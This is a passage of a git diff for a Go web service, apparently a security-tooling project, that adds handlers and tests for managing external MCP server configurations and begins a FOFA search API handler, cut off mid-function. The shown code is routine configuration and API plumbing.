configPath: configPath, + logger: logger, + } +} + +// GetExternalMCPs 获取所有外部MCP配置 +func (h *ExternalMCPHandler) GetExternalMCPs(c *gin.Context) { + h.mu.RLock() + defer h.mu.RUnlock() + + configs := h.manager.GetConfigs() + + // 获取所有外部MCP的工具数量 + toolCounts := h.manager.GetToolCounts() + + // 转换为响应格式 + result := make(map[string]ExternalMCPResponse) + for name, cfg := range configs { + client, exists := h.manager.GetClient(name) + status := "disconnected" + if exists { + status = client.GetStatus() + } else if h.isEnabled(cfg) { + status = "disconnected" + } else { + status = "disabled" + } + + toolCount := toolCounts[name] + errorMsg := externalMCPStatusError(h.manager, name, status) + + result[name] = ExternalMCPResponse{ + Config: cfg, + Status: status, + ToolCount: toolCount, + Error: errorMsg, + } + } + + c.JSON(http.StatusOK, gin.H{ + "servers": result, + "stats": h.manager.GetStats(), + }) +} + +// GetExternalMCP 获取单个外部MCP配置 +func (h *ExternalMCPHandler) GetExternalMCP(c *gin.Context) { + name := c.Param("name") + + h.mu.RLock() + defer h.mu.RUnlock() + + configs := h.manager.GetConfigs() + cfg, exists := configs[name] + if !exists { + c.JSON(http.StatusNotFound, gin.H{"error": "外部MCP配置不存在"}) + return + } + + client, clientExists := h.manager.GetClient(name) + status := "disconnected" + if clientExists { + status = client.GetStatus() + } else if h.isEnabled(cfg) { + status = "disconnected" + } else { + status = "disabled" + } + + // 获取工具数量 + toolCount := 0 + if clientExists && client.IsConnected() { + if count, err := h.manager.GetToolCount(name); err == nil { + toolCount = count + } + } + + c.JSON(http.StatusOK, ExternalMCPResponse{ + Config: cfg, + Status: status, + ToolCount: toolCount, + Error: externalMCPStatusError(h.manager, name, status), + }) +} + +// externalMCPStatusError 在 error/disconnected 状态下返回最近错误(含断连原因)。 +func externalMCPStatusError(manager *mcp.ExternalMCPManager, name, status string) string { + if status != "error" && status != "disconnected" { + return "" + } + return manager.GetError(name) +} + +// AddOrUpdateExternalMCP 添加或更新外部MCP配置 +func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) { + var req AddOrUpdateExternalMCPRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()}) + return + } + + name := c.Param("name") + if name == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "名称不能为空"}) + return + } + + // 验证配置 + if err := h.validateConfig(req.Config); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + h.mu.Lock() + defer h.mu.Unlock() + + // 添加或更新配置 + if err := h.manager.AddOrUpdateConfig(name, req.Config); err != nil { + h.logger.Error("添加或更新外部MCP配置失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "添加或更新配置失败: " + err.Error()}) + return + } + + // 更新内存中的配置 + if h.config.ExternalMCP.Servers == nil { + h.config.ExternalMCP.Servers = make(map[string]config.ExternalMCPServerConfig) + } + + cfg := req.Config + + // 官方 disabled 字段 → ExternalMCPEnable 取反 + if cfg.Disabled { + cfg.ExternalMCPEnable = false + } else if !cfg.ExternalMCPEnable { + // 用户未显式设置 external_mcp_enable,官方配置默认就是启用的 + cfg.ExternalMCPEnable = true + } + + // 展开 ${VAR} 环境变量 + config.ExpandConfigEnv(&cfg) + + h.config.ExternalMCP.Servers[name] = cfg + + // 保存到配置文件 + if err := h.saveConfig(); err != nil { + h.logger.Error("保存配置失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()}) + return + } + + h.logger.Info("外部MCP配置已更新", zap.String("name", name)) + if h.audit != nil { + h.audit.Record(c, audit.Entry{ + Category: "external_mcp", + Action: "upsert", + Result: "success", + ResourceType: "external_mcp", + ResourceID: name, + Message: "更新外部 MCP 配置", + }) + } + c.JSON(http.StatusOK, gin.H{"message": "配置已更新"}) +} + +// DeleteExternalMCP 删除外部MCP配置 +func (h *ExternalMCPHandler) DeleteExternalMCP(c *gin.Context) { + name := c.Param("name") + + h.mu.Lock() + defer h.mu.Unlock() + + // 移除配置 + if err := h.manager.RemoveConfig(name); err != nil { + c.JSON(http.StatusNotFound, gin.H{"error": "配置不存在"}) + return + } + + // 从内存配置中删除 + if h.config.ExternalMCP.Servers != nil { + delete(h.config.ExternalMCP.Servers, name) + } + + // 保存到配置文件 + if err := h.saveConfig(); err != nil { + h.logger.Error("保存配置失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()}) + return + } + + h.logger.Info("外部MCP配置已删除", zap.String("name", name)) + if h.audit != nil { + h.audit.Record(c, audit.Entry{ + Category: "external_mcp", + Action: "delete", + Result: "success", + ResourceType: "external_mcp", + ResourceID: name, + Message: "删除外部 MCP 配置", + }) + } + c.JSON(http.StatusOK, gin.H{"message": "配置已删除"}) +} + +// StartExternalMCP 启动外部MCP +func (h *ExternalMCPHandler) StartExternalMCP(c *gin.Context) { + name := c.Param("name") + + h.mu.Lock() + defer h.mu.Unlock() + + // 更新配置为启用 + if h.config.ExternalMCP.Servers == nil { + h.config.ExternalMCP.Servers = make(map[string]config.ExternalMCPServerConfig) + } + cfg := h.config.ExternalMCP.Servers[name] + cfg.ExternalMCPEnable = true + h.config.ExternalMCP.Servers[name] = cfg + + // 保存到配置文件 + if err := h.saveConfig(); err != nil { + h.logger.Error("保存配置失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()}) + return + } + + // 启动客户端(立即创建客户端并设置状态为connecting,实际连接在后台进行) + h.logger.Info("开始启动外部MCP", zap.String("name", name)) + if err := h.manager.StartClient(name); err != nil { + h.logger.Error("启动外部MCP失败", zap.String("name", name), zap.Error(err)) + c.JSON(http.StatusBadRequest, gin.H{ + "error": err.Error(), + "status": "error", + }) + return + } + + // 获取客户端状态(应该是connecting) + client, exists := h.manager.GetClient(name) + status := "connecting" + if exists { + status = client.GetStatus() + } + + // 立即返回,不等待连接完成 + // 客户端会在后台异步连接,用户可以通过状态查询接口查看连接状态 + c.JSON(http.StatusOK, gin.H{ + "message": "外部MCP启动请求已提交,正在后台连接中", + "status": status, + }) +} + +// StopExternalMCP 停止外部MCP +func (h *ExternalMCPHandler) StopExternalMCP(c *gin.Context) { + name := c.Param("name") + + h.mu.Lock() + defer h.mu.Unlock() + + // 停止客户端 + if err := h.manager.StopClient(name); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + // 更新配置 + if h.config.ExternalMCP.Servers == nil { + h.config.ExternalMCP.Servers = make(map[string]config.ExternalMCPServerConfig) + } + cfg := h.config.ExternalMCP.Servers[name] + cfg.ExternalMCPEnable = false + h.config.ExternalMCP.Servers[name] = cfg + + // 保存到配置文件 + if err := h.saveConfig(); err != nil { + h.logger.Error("保存配置失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()}) + return + } + + h.logger.Info("外部MCP已停止", zap.String("name", name)) + c.JSON(http.StatusOK, gin.H{"message": "外部MCP已停止"}) +} + +// GetExternalMCPStats 获取统计信息 +func (h *ExternalMCPHandler) GetExternalMCPStats(c *gin.Context) { + stats := h.manager.GetStats() + c.JSON(http.StatusOK, stats) +} + +// validateConfig 验证配置(同时支持官方 type 字段和旧版 transport 字段) +func (h *ExternalMCPHandler) validateConfig(cfg config.ExternalMCPServerConfig) error { + transport := cfg.GetTransportType() + if transport == "" { + return fmt.Errorf("需要指定 command(stdio模式)或 url + type(http/sse模式)") + } + + switch transport { + case "http": + if cfg.URL == "" { + return fmt.Errorf("HTTP模式需要 url") + } + case "stdio": + if cfg.Command == "" { + return fmt.Errorf("stdio模式需要 command") + } + case "sse": + if cfg.URL == "" { + return fmt.Errorf("SSE模式需要 url") + } + default: + return fmt.Errorf("不支持的传输模式: %s,支持的模式: http, stdio, sse", transport) + } + + return nil +} + +// isEnabled 检查是否启用 +func (h *ExternalMCPHandler) isEnabled(cfg config.ExternalMCPServerConfig) bool { + return cfg.ExternalMCPEnable +} + +// saveConfig 保存配置到文件 +func (h *ExternalMCPHandler) saveConfig() error { + data, err := os.ReadFile(h.configPath) + if err != nil { + return fmt.Errorf("读取配置文件失败: %w", err) + } + + if err := os.WriteFile(h.configPath+".backup", data, 0644); err != nil { + h.logger.Warn("创建配置备份失败", zap.Error(err)) + } + + root, err := loadYAMLDocument(h.configPath) + if err != nil { + return fmt.Errorf("解析配置文件失败: %w", err) + } + + updateExternalMCPConfig(root, h.config.ExternalMCP) + + if err := writeYAMLDocument(h.configPath, root); err != nil { + return fmt.Errorf("保存配置文件失败: %w", err) + } + + h.logger.Info("配置已保存", zap.String("path", h.configPath)) + return nil +} + +// updateExternalMCPConfig 更新外部MCP配置 +func updateExternalMCPConfig(doc *yaml.Node, cfg config.ExternalMCPConfig) { + root := doc.Content[0] + externalMCPNode := ensureMap(root, "external_mcp") + serversNode := ensureMap(externalMCPNode, "servers") + + // 清空现有服务器配置 + serversNode.Content = nil + + // 添加新的服务器配置 + for name, serverCfg := range cfg.Servers { + nameNode := &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!str", Value: name} + serverNode := &yaml.Node{Kind: yaml.MappingNode, Tag: "!!map"} + serversNode.Content = append(serversNode.Content, nameNode, serverNode) + + // type(官方 MCP 传输类型) + effectiveType := serverCfg.GetTransportType() + if effectiveType != "" && effectiveType != "stdio" { + // stdio 可省略(有 command 时自动推断) + setStringInMap(serverNode, "type", effectiveType) + } + if serverCfg.Command != "" { + setStringInMap(serverNode, "command", serverCfg.Command) + } + if len(serverCfg.Args) > 0 { + setStringArrayInMap(serverNode, "args", serverCfg.Args) + } + if serverCfg.Env != nil && len(serverCfg.Env) > 0 { + envNode := ensureMap(serverNode, "env") + for envKey, envValue := range serverCfg.Env { + setStringInMap(envNode, envKey, envValue) + } + } + if serverCfg.URL != "" { + setStringInMap(serverNode, "url", serverCfg.URL) + } + if serverCfg.Headers != nil && len(serverCfg.Headers) > 0 { + headersNode := ensureMap(serverNode, "headers") + for k, v := range serverCfg.Headers { + setStringInMap(headersNode, k, v) + } + } + if serverCfg.Description != "" { + setStringInMap(serverNode, "description", serverCfg.Description) + } + if serverCfg.Timeout > 0 { + setIntInMap(serverNode, "timeout", serverCfg.Timeout) + } + // 官方标准字段 + if serverCfg.Disabled { + setBoolInMap(serverNode, "disabled", true) + } + if len(serverCfg.AutoApprove) > 0 { + setStringArrayInMap(serverNode, "autoApprove", serverCfg.AutoApprove) + } + + // SDK 高级配置 + if serverCfg.MaxRetries > 0 { + setIntInMap(serverNode, "max_retries", serverCfg.MaxRetries) + } + if serverCfg.TerminateDuration > 0 { + setIntInMap(serverNode, "terminate_duration", serverCfg.TerminateDuration) + } + if serverCfg.KeepAlive > 0 { + setIntInMap(serverNode, "keep_alive", serverCfg.KeepAlive) + } + + setBoolInMap(serverNode, "external_mcp_enable", serverCfg.ExternalMCPEnable) + if serverCfg.ToolEnabled != nil && len(serverCfg.ToolEnabled) > 0 { + toolEnabledNode := ensureMap(serverNode, "tool_enabled") + for toolName, enabled := range serverCfg.ToolEnabled { + setBoolInMap(toolEnabledNode, toolName, enabled) + } + } + } +} + +// setStringArrayInMap 设置字符串数组 +func setStringArrayInMap(mapNode *yaml.Node, key string, values []string) { + _, valueNode := ensureKeyValue(mapNode, key) + valueNode.Kind = yaml.SequenceNode + valueNode.Tag = "!!seq" + valueNode.Content = nil + for _, v := range values { + itemNode := &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!str", Value: v} + valueNode.Content = append(valueNode.Content, itemNode) + } +} + +// AddOrUpdateExternalMCPRequest 添加或更新外部MCP请求 +type AddOrUpdateExternalMCPRequest struct { + Config config.ExternalMCPServerConfig `json:"config"` +} + +// ExternalMCPResponse 外部MCP响应 +type ExternalMCPResponse struct { + Config config.ExternalMCPServerConfig `json:"config"` + Status string `json:"status"` // "connected", "disconnected", "disabled", "error", "connecting" + ToolCount int `json:"tool_count"` // 工具数量 + Error string `json:"error,omitempty"` // 错误信息(仅在status为error时存在) +} diff --git a/internal/handler/external_mcp_test.go b/internal/handler/external_mcp_test.go new file mode 100644 index 00000000..e4cf3c1f --- /dev/null +++ b/internal/handler/external_mcp_test.go @@ -0,0 +1,518 @@ +package handler + +import ( + "bytes" + "encoding/json" + "net/http" + "net/http/httptest" + "os" + "strings" + "testing" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/mcp" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +func setupTestRouter() (*gin.Engine, *ExternalMCPHandler, string) { + gin.SetMode(gin.TestMode) + router := gin.New() + + // 创建临时配置文件 + tmpFile, err := os.CreateTemp("", "test-config-*.yaml") + if err != nil { + panic(err) + } + tmpFile.WriteString("server:\n host: 0.0.0.0\n port: 8080\n") + tmpFile.Close() + configPath := tmpFile.Name() + + logger := zap.NewNop() + manager := mcp.NewExternalMCPManager(logger) + cfg := &config.Config{ + ExternalMCP: config.ExternalMCPConfig{ + Servers: make(map[string]config.ExternalMCPServerConfig), + }, + } + + handler := NewExternalMCPHandler(manager, cfg, configPath, logger) + + api := router.Group("/api") + api.GET("/external-mcp", handler.GetExternalMCPs) + api.GET("/external-mcp/stats", handler.GetExternalMCPStats) + api.GET("/external-mcp/:name", handler.GetExternalMCP) + api.PUT("/external-mcp/:name", handler.AddOrUpdateExternalMCP) + api.DELETE("/external-mcp/:name", handler.DeleteExternalMCP) + api.POST("/external-mcp/:name/start", handler.StartExternalMCP) + api.POST("/external-mcp/:name/stop", handler.StopExternalMCP) + + return router, handler, configPath +} + +func cleanupTestConfig(configPath string) { + os.Remove(configPath) + os.Remove(configPath + ".backup") +} + +func TestExternalMCPHandler_AddOrUpdateExternalMCP_Stdio(t *testing.T) { + router, _, configPath := setupTestRouter() + defer cleanupTestConfig(configPath) + + // 测试添加stdio模式的配置(官方格式:有 command 时 type 可省略) + configJSON := `{ + "command": "python3", + "args": ["/path/to/script.py", "--server", "http://example.com"], + "description": "Test stdio MCP", + "timeout": 300, + "external_mcp_enable": true + }` + + var configObj config.ExternalMCPServerConfig + if err := json.Unmarshal([]byte(configJSON), &configObj); err != nil { + t.Fatalf("解析配置JSON失败: %v", err) + } + + reqBody := AddOrUpdateExternalMCPRequest{ + Config: configObj, + } + + body, _ := json.Marshal(reqBody) + req := httptest.NewRequest("PUT", "/api/external-mcp/test-stdio", bytes.NewBuffer(body)) + req.Header.Set("Content-Type", "application/json") + w := httptest.NewRecorder() + + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String()) + } + + // 验证配置已添加 + req2 := httptest.NewRequest("GET", "/api/external-mcp/test-stdio", nil) + w2 := httptest.NewRecorder() + router.ServeHTTP(w2, req2) + + if w2.Code != http.StatusOK { + t.Fatalf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String()) + } + + var response ExternalMCPResponse + if err := json.Unmarshal(w2.Body.Bytes(), &response); err != nil { + t.Fatalf("解析响应失败: %v", err) + } + + if response.Config.Command != "python3" { + t.Errorf("期望command为python3,实际%s", response.Config.Command) + } + if len(response.Config.Args) != 3 { + t.Errorf("期望args长度为3,实际%d", len(response.Config.Args)) + } + if response.Config.Description != "Test stdio MCP" { + t.Errorf("期望description为'Test stdio MCP',实际%s", response.Config.Description) + } + if response.Config.Timeout != 300 { + t.Errorf("期望timeout为300,实际%d", response.Config.Timeout) + } +} + +func TestExternalMCPHandler_AddOrUpdateExternalMCP_HTTP(t *testing.T) { + router, _, configPath := setupTestRouter() + defer cleanupTestConfig(configPath) + + // 测试添加HTTP模式的配置(使用官方 type 字段) + configJSON := `{ + "type": "http", + "url": "http://127.0.0.1:8081/mcp", + "external_mcp_enable": true + }` + + var configObj config.ExternalMCPServerConfig + if err := json.Unmarshal([]byte(configJSON), &configObj); err != nil { + t.Fatalf("解析配置JSON失败: %v", err) + } + + reqBody := AddOrUpdateExternalMCPRequest{ + Config: configObj, + } + + body, _ := json.Marshal(reqBody) + req := httptest.NewRequest("PUT", "/api/external-mcp/test-http", bytes.NewBuffer(body)) + req.Header.Set("Content-Type", "application/json") + w := httptest.NewRecorder() + + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String()) + } + + // 验证配置已添加 + req2 := httptest.NewRequest("GET", "/api/external-mcp/test-http", nil) + w2 := httptest.NewRecorder() + router.ServeHTTP(w2, req2) + + if w2.Code != http.StatusOK { + t.Fatalf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String()) + } + + var response ExternalMCPResponse + if err := json.Unmarshal(w2.Body.Bytes(), &response); err != nil { + t.Fatalf("解析响应失败: %v", err) + } + + if response.Config.Type != "http" { + t.Errorf("期望type为http,实际%s", response.Config.Type) + } + if response.Config.URL != "http://127.0.0.1:8081/mcp" { + t.Errorf("期望url为'http://127.0.0.1:8081/mcp',实际%s", response.Config.URL) + } +} + +func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidConfig(t *testing.T) { + router, _, configPath := setupTestRouter() + defer cleanupTestConfig(configPath) + + testCases := []struct { + name string + configJSON string + expectedErr string + }{ + { + name: "缺少command和url", + configJSON: `{"external_mcp_enable": true}`, + expectedErr: "需要指定 command(stdio模式)或 url + type(http/sse模式)", + }, + { + name: "stdio模式缺少command", + configJSON: `{"args": ["test"], "external_mcp_enable": true}`, + expectedErr: "stdio模式需要command", + }, + { + name: "http模式缺少url", + configJSON: `{"type": "http", "external_mcp_enable": true}`, + expectedErr: "HTTP模式需要 url", + }, + { + name: "无效的type", + configJSON: `{"type": "invalid", "external_mcp_enable": true}`, + expectedErr: "不支持的传输模式", + }, + } + + for _, tc := range testCases { + t.Run(tc.name, func(t *testing.T) { + var configObj config.ExternalMCPServerConfig + if err := json.Unmarshal([]byte(tc.configJSON), &configObj); err != nil { + t.Fatalf("解析配置JSON失败: %v", err) + } + + reqBody := AddOrUpdateExternalMCPRequest{ + Config: configObj, + } + + body, _ := json.Marshal(reqBody) + req := httptest.NewRequest("PUT", "/api/external-mcp/test-invalid", bytes.NewBuffer(body)) + req.Header.Set("Content-Type", "application/json") + w := httptest.NewRecorder() + + router.ServeHTTP(w, req) + + if w.Code != http.StatusBadRequest { + t.Errorf("期望状态码400,实际%d: %s", w.Code, w.Body.String()) + } + + var response map[string]interface{} + if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil { + t.Fatalf("解析响应失败: %v", err) + } + + errorMsg := response["error"].(string) + // 对于stdio模式缺少command的情况,错误信息可能略有不同 + if tc.name == "stdio模式缺少command" { + if !strings.Contains(errorMsg, "stdio") && !strings.Contains(errorMsg, "command") { + t.Errorf("期望错误信息包含'stdio'或'command',实际'%s'", errorMsg) + } + } else if !strings.Contains(errorMsg, tc.expectedErr) { + t.Errorf("期望错误信息包含'%s',实际'%s'", tc.expectedErr, errorMsg) + } + }) + } +} + +func TestExternalMCPHandler_DeleteExternalMCP(t *testing.T) { + router, handler, configPath := setupTestRouter() + defer cleanupTestConfig(configPath) + + // 先添加一个配置 + configObj := config.ExternalMCPServerConfig{ + Command: "python3", + ExternalMCPEnable: true, + } + handler.manager.AddOrUpdateConfig("test-delete", configObj) + + // 删除配置 + req := httptest.NewRequest("DELETE", "/api/external-mcp/test-delete", nil) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String()) + } + + // 验证配置已删除 + req2 := httptest.NewRequest("GET", "/api/external-mcp/test-delete", nil) + w2 := httptest.NewRecorder() + router.ServeHTTP(w2, req2) + + if w2.Code != http.StatusNotFound { + t.Errorf("期望状态码404,实际%d: %s", w2.Code, w2.Body.String()) + } +} + +func TestExternalMCPStatusError(t *testing.T) { + manager := mcp.NewExternalMCPManager(zap.NewNop()) + if got := externalMCPStatusError(manager, "x", "connected"); got != "" { + t.Fatalf("connected status should not return error, got %q", got) + } + if got := externalMCPStatusError(manager, "x", "connecting"); got != "" { + t.Fatalf("connecting status should not return error, got %q", got) + } +} + +func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) { + router, handler, _ := setupTestRouter() + + // 添加多个配置 + handler.manager.AddOrUpdateConfig("test1", config.ExternalMCPServerConfig{ + Command: "python3", + ExternalMCPEnable: true, + }) + handler.manager.AddOrUpdateConfig("test2", config.ExternalMCPServerConfig{ + URL: "http://127.0.0.1:8081/mcp", + ExternalMCPEnable: false, + }) + + req := httptest.NewRequest("GET", "/api/external-mcp", nil) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String()) + } + + var response map[string]interface{} + if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil { + t.Fatalf("解析响应失败: %v", err) + } + + servers := response["servers"].(map[string]interface{}) + if len(servers) != 2 { + t.Errorf("期望2个服务器,实际%d", len(servers)) + } + if _, ok := servers["test1"]; !ok { + t.Error("期望包含test1") + } + if _, ok := servers["test2"]; !ok { + t.Error("期望包含test2") + } + + stats := response["stats"].(map[string]interface{}) + if int(stats["total"].(float64)) != 2 { + t.Errorf("期望总数为2,实际%d", int(stats["total"].(float64))) + } +} + +func TestExternalMCPHandler_GetExternalMCPStats(t *testing.T) { + router, handler, _ := setupTestRouter() + + // 添加配置 + handler.manager.AddOrUpdateConfig("enabled1", config.ExternalMCPServerConfig{ + Command: "python3", + ExternalMCPEnable: true, + }) + handler.manager.AddOrUpdateConfig("enabled2", config.ExternalMCPServerConfig{ + URL: "http://127.0.0.1:8081/mcp", + ExternalMCPEnable: true, + }) + handler.manager.AddOrUpdateConfig("disabled1", config.ExternalMCPServerConfig{ + Command: "python3", + }) + + req := httptest.NewRequest("GET", "/api/external-mcp/stats", nil) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String()) + } + + var stats map[string]interface{} + if err := json.Unmarshal(w.Body.Bytes(), &stats); err != nil { + t.Fatalf("解析响应失败: %v", err) + } + + if int(stats["total"].(float64)) != 3 { + t.Errorf("期望总数为3,实际%d", int(stats["total"].(float64))) + } + if int(stats["enabled"].(float64)) != 2 { + t.Errorf("期望启用数为2,实际%d", int(stats["enabled"].(float64))) + } + if int(stats["disabled"].(float64)) != 1 { + t.Errorf("期望停用数为1,实际%d", int(stats["disabled"].(float64))) + } +} + +func TestExternalMCPHandler_StartStopExternalMCP(t *testing.T) { + router, handler, configPath := setupTestRouter() + defer cleanupTestConfig(configPath) + + // 添加一个禁用的配置 + handler.manager.AddOrUpdateConfig("test-start-stop", config.ExternalMCPServerConfig{ + Command: "python3", + }) + + // 测试启动(可能会失败,因为没有真实的服务器) + req := httptest.NewRequest("POST", "/api/external-mcp/test-start-stop/start", nil) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + // 启动可能会失败,但应该返回合理的状态码 + if w.Code != http.StatusOK { + // 如果启动失败,应该是400或500 + if w.Code != http.StatusBadRequest && w.Code != http.StatusInternalServerError { + t.Errorf("期望状态码200/400/500,实际%d: %s", w.Code, w.Body.String()) + } + } + + // 测试停止 + req2 := httptest.NewRequest("POST", "/api/external-mcp/test-start-stop/stop", nil) + w2 := httptest.NewRecorder() + router.ServeHTTP(w2, req2) + + if w2.Code != http.StatusOK { + t.Errorf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String()) + } +} + +func TestExternalMCPHandler_GetExternalMCP_NotFound(t *testing.T) { + router, _, _ := setupTestRouter() + + req := httptest.NewRequest("GET", "/api/external-mcp/nonexistent", nil) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + if w.Code != http.StatusNotFound { + t.Errorf("期望状态码404,实际%d: %s", w.Code, w.Body.String()) + } +} + +func TestExternalMCPHandler_DeleteExternalMCP_NotFound(t *testing.T) { + router, _, configPath := setupTestRouter() + defer cleanupTestConfig(configPath) + + req := httptest.NewRequest("DELETE", "/api/external-mcp/nonexistent", nil) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + // 删除不存在的配置可能返回200(幂等操作)或404,都是合理的 + if w.Code != http.StatusNotFound && w.Code != http.StatusOK { + t.Errorf("期望状态码404或200,实际%d: %s", w.Code, w.Body.String()) + } +} + +func TestExternalMCPHandler_AddOrUpdateExternalMCP_EmptyName(t *testing.T) { + router, _, _ := setupTestRouter() + + configObj := config.ExternalMCPServerConfig{ + Command: "python3", + ExternalMCPEnable: true, + } + + reqBody := AddOrUpdateExternalMCPRequest{ + Config: configObj, + } + + body, _ := json.Marshal(reqBody) + req := httptest.NewRequest("PUT", "/api/external-mcp/", bytes.NewBuffer(body)) + req.Header.Set("Content-Type", "application/json") + w := httptest.NewRecorder() + + router.ServeHTTP(w, req) + + // 空名称应该返回404或400 + if w.Code != http.StatusNotFound && w.Code != http.StatusBadRequest { + t.Errorf("期望状态码404或400,实际%d: %s", w.Code, w.Body.String()) + } +} + +func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidJSON(t *testing.T) { + router, _, _ := setupTestRouter() + + // 发送无效的JSON + body := []byte(`{"config": invalid json}`) + req := httptest.NewRequest("PUT", "/api/external-mcp/test", bytes.NewBuffer(body)) + req.Header.Set("Content-Type", "application/json") + w := httptest.NewRecorder() + + router.ServeHTTP(w, req) + + if w.Code != http.StatusBadRequest { + t.Errorf("期望状态码400,实际%d: %s", w.Code, w.Body.String()) + } +} + +func TestExternalMCPHandler_UpdateExistingConfig(t *testing.T) { + router, handler, configPath := setupTestRouter() + defer cleanupTestConfig(configPath) + + // 先添加配置 + config1 := config.ExternalMCPServerConfig{ + Command: "python3", + ExternalMCPEnable: true, + } + handler.manager.AddOrUpdateConfig("test-update", config1) + + // 更新配置 + config2 := config.ExternalMCPServerConfig{ + URL: "http://127.0.0.1:8081/mcp", + ExternalMCPEnable: true, + } + + reqBody := AddOrUpdateExternalMCPRequest{ + Config: config2, + } + + body, _ := json.Marshal(reqBody) + req := httptest.NewRequest("PUT", "/api/external-mcp/test-update", bytes.NewBuffer(body)) + req.Header.Set("Content-Type", "application/json") + w := httptest.NewRecorder() + + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String()) + } + + // 验证配置已更新 + req2 := httptest.NewRequest("GET", "/api/external-mcp/test-update", nil) + w2 := httptest.NewRecorder() + router.ServeHTTP(w2, req2) + + if w2.Code != http.StatusOK { + t.Fatalf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String()) + } + + var response ExternalMCPResponse + if err := json.Unmarshal(w2.Body.Bytes(), &response); err != nil { + t.Fatalf("解析响应失败: %v", err) + } + + if response.Config.URL != "http://127.0.0.1:8081/mcp" { + t.Errorf("期望url为'http://127.0.0.1:8081/mcp',实际%s", response.Config.URL) + } + if response.Config.Command != "" { + t.Errorf("期望command为空,实际%s", response.Config.Command) + } +} diff --git a/internal/handler/fofa.go b/internal/handler/fofa.go new file mode 100644 index 00000000..84ec8131 --- /dev/null +++ b/internal/handler/fofa.go @@ -0,0 +1,467 @@ +package handler + +import ( + "context" + "encoding/base64" + "encoding/json" + "errors" + "fmt" + "net/http" + "net/url" + "os" + "strings" + "time" + + "cyberstrike-ai/internal/config" + openaiClient "cyberstrike-ai/internal/openai" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +type FofaHandler struct { + cfg *config.Config + logger *zap.Logger + client *http.Client + openAIClient *openaiClient.Client +} + +func NewFofaHandler(cfg *config.Config, logger *zap.Logger) *FofaHandler { + // LLM 请求通常比 FOFA 查询更慢一点,单独给一个更宽松的超时。 + llmHTTPClient := &http.Client{Timeout: 2 * time.Minute} + var llmCfg *config.OpenAIConfig + if cfg != nil { + llmCfg = &cfg.OpenAI + } + return &FofaHandler{ + cfg: cfg, + logger: logger, + client: &http.Client{Timeout: 30 * time.Second}, + openAIClient: openaiClient.NewClient(llmCfg, llmHTTPClient, logger), + } +} + +type fofaSearchRequest struct { + Query string `json:"query" binding:"required"` + Size int `json:"size,omitempty"` + Page int `json:"page,omitempty"` + Fields string `json:"fields,omitempty"` + Full bool `json:"full,omitempty"` +} + +type fofaParseRequest struct { + Text string `json:"text" binding:"required"` +} + +type fofaParseResponse struct { + Query string `json:"query"` + Explanation string `json:"explanation,omitempty"` + Warnings []string `json:"warnings,omitempty"` +} + +type fofaAPIResponse struct { + Error bool `json:"error"` + ErrMsg string `json:"errmsg"` + Size int `json:"size"` + Page int `json:"page"` + Total int `json:"total"` + Mode string `json:"mode"` + Query string `json:"query"` + Results [][]interface{} `json:"results"` +} + +type fofaSearchResponse struct { + Query string `json:"query"` + Size int `json:"size"` + Page int `json:"page"` + Total int `json:"total"` + Fields []string `json:"fields"` + ResultsCount int `json:"results_count"` + Results []map[string]interface{} `json:"results"` +} + +func (h *FofaHandler) resolveCredentials() (email, apiKey string) { + // 优先环境变量(便于容器部署),其次配置文件 + email = strings.TrimSpace(os.Getenv("FOFA_EMAIL")) + apiKey = strings.TrimSpace(os.Getenv("FOFA_API_KEY")) + if email != "" && apiKey != "" { + return email, apiKey + } + if h.cfg != nil { + if email == "" { + email = strings.TrimSpace(h.cfg.FOFA.Email) + } + if apiKey == "" { + apiKey = strings.TrimSpace(h.cfg.FOFA.APIKey) + } + } + return email, apiKey +} + +func (h *FofaHandler) resolveBaseURL() string { + if h.cfg != nil { + if v := strings.TrimSpace(h.cfg.FOFA.BaseURL); v != "" { + return v + } + } + return "https://fofa.info/api/v1/search/all" +} + +// ParseNaturalLanguage 将自然语言解析为 FOFA 查询语法(仅生成,不执行查询) +func (h *FofaHandler) 